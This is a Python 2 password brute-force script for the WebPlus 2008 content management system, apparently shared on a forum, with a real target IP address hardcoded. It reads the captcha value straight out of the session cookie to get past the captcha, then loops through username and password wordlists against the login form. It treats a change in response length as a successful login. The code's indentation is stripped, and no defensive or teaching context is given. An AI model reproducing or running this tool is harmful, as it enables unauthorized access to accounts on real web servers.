webplus2008密码爆破脚本

import requests,sys
vcodeurl='http://202.119.224.200/control/validateimage'
loginurl='http://202.119.224.200/webplus/login?returnUrl=%2Findex.jsp%3FsiteId%3D0%26pageId%3D0'
errlen=0
def getcookie():
r=requests.get(vcodeurl)
tempcookie=r.headers['set-cookie']
tempcookie=tempcookie.replace('Path=/','')
tempcookie=tempcookie.replace(',','')
tempcookie=tempcookie.replace(' ','')
return tempcookie
def getvcode(tempcookie):
length=len(tempcookie)
tempvcode=tempcookie[length-5:length-1]
return tempvcode
def login(name,upass,code,cookie):
global errlen
print 'try:'+name+'+'+upass
payload={'isSubmitted':'1','userName':name,'password':upass,'validateimage':code}
header={'cookie':cookie}
r=requests.post(loginurl,data=payload,headers=header)
if errlen!=len(r.text) and errlen!=0:
print 'success!: '+name+' '+upass
print r.text
sys.exit(1)
else:
errlen=len(r.text)

print r.text
if __name__ == '__main__':
if len(sys.argv)!=3:
print "\t webplus2008 brute v1.0\n"
print "\t --------------------------------------------------\n"
print "\t Usage: ./brute.py \n"
sys.exit(1)
try:
users = open(sys.argv[1], "r").readlines()
except(IOError):
print "[-] Error: Check your userlist path\n"
sys.exit(1)

try:
words = open(sys.argv[2], "r").readlines()
except(IOError):
print "[-] Error: Check your wordlist path\n"
sys.exit(1)
for username in users:
for password in words:
relogin=0
username=username.replace('\n','')
password=password.replace('\n','')
newcookie=getcookie()
vcode=getvcode(newcookie)
try:
login(username,password,vcode,newcookie)
except:
relogin+=1
if relogin==3:
pass
else:
login(username,password,vcode,newcookie)

传个文件吧b